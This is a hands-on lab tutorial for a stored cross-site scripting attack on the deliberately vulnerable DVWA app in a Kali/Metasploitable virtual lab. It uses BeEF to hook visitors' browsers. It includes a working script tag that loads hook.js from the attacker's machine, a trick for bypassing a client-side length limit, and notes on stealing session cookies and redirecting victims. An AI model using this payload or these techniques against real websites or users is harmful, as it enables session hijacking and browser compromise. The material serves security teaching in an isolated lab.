Today we will perform Stored Cross Site Scripting (XSS) attack using a tool called BeEF. In stored XSS, attacker finds a target web application that not only vulnerable to XSS but also stores the injected code in it. E.g. feedback forms stores the text that is inputted into it. So we can try such forms or textboxes in web application. See the figure.

Fig. Stored Cross Site Scripting Attack

Here, attacker finds a XSS vulnerable page that accepts and stores the data or text from users. Thus attacker infects it by injecting script. Now other normal user visits that web page, the malicious script gets executed in normal user's browser. Thus anything bad can be done with victim. Attacker can even hijack user’s session as well as defaces or redirects the website. A tool known as BeEF i.e. Browser Exploitation Framework can be used to control the victim's browser.

Deliverable:

Lab Set up

• Virtualization using Oracle Virtual box

• Attacker’s System: Kali Linux

• Target 1 System : Metasploitable 2

• Target 2 System : Any Computer or Mobile with a web Browser (Ex. Windows 7)

1. In Kali Linux --> browser --> Visit Target Website.

Ex. DVWA (Damn Vulnerable Web Application). It is integrated in Metasploitable 2. Just put target's ip address in Kali Linux browser. Now click on DVWA. Put Username as 'admin' and Password as 'password'. Now go to DVWA security --> Make the security as 'low' and submit. This is done to let the attack work.

2. Click on the XSS Stored tag. Here you will find a guest book to give some feedback. There are two textboxes as name and message. Try inputting some normal text. You will see that your input is stored and one entry for that is made. Now you may try inputting some XSS alert box script. Now any one who will visit this web page, this script will run on his/her browser. But now we are going to see how to automate this and get the victim's browser totally under our control using BeEF i.e. Browser Exploitation Framework.

3. Start BeEF.

In Kali Linux --> Applications --> Kali Linux --> Exploitation Tools --> BeEF XSS Framework --> beef

It will start BeEF in web browser in Kali Linux with the URL as

127.0.0.1:3000/ui/authentication

4. Change that IP address with your own IP of Kali Linux. And enter. Your New URL can be as follows:

Ex. 192.168.0.105:3000/ui/authentication

5. You will see an authentication web page for BeEF. Type the credentials username and password as beef and beef respectively.

6. Now copy the URL e.g. 192.168.0.105:3000/ui/panel and paste it into new tab and change it to 'hook.js' and enter.

Ex. 192.168.0.105:3000/hook.js

7. Copy the above above URL and paste it into message textbox of XSS stored page under <script> tag as follows:

<script src="http://192.168.0.105:3000/hook.js"></script>

Note: Web page may not allow you to type the whole above script code because of maximum length of the textbox was set as 50 by developer. You can bypass this restriction by doing following:

Right click on textbox --> Inspect element --> Now you can change the client side restriction by changing the 'maxlength' parameter to any value. Give it some value sufficiently bigger than 50.

Now again try to input the above script code and click Sign Guestbook. You will see that one entry will be added but there will be no text in the message part of this entry. Done!

8. Now try logging into that web page from any other system (Ex. Windows 7). Thus anyone who visits that vulnerable web page, that system's IP address will be shown in the online browser in the attackers BeEF panel webpage i.e. 192.168.0.105:3000/ui/panel

9. Now go to commands in BeEF panel. You will find number of commands that can be run on victim's browser from Kali Linux BeEF. The victim's browser is under attacker's control. You can redirect it, deface or can execute scripts, play sound, get session id cookies or even metasploit the victim.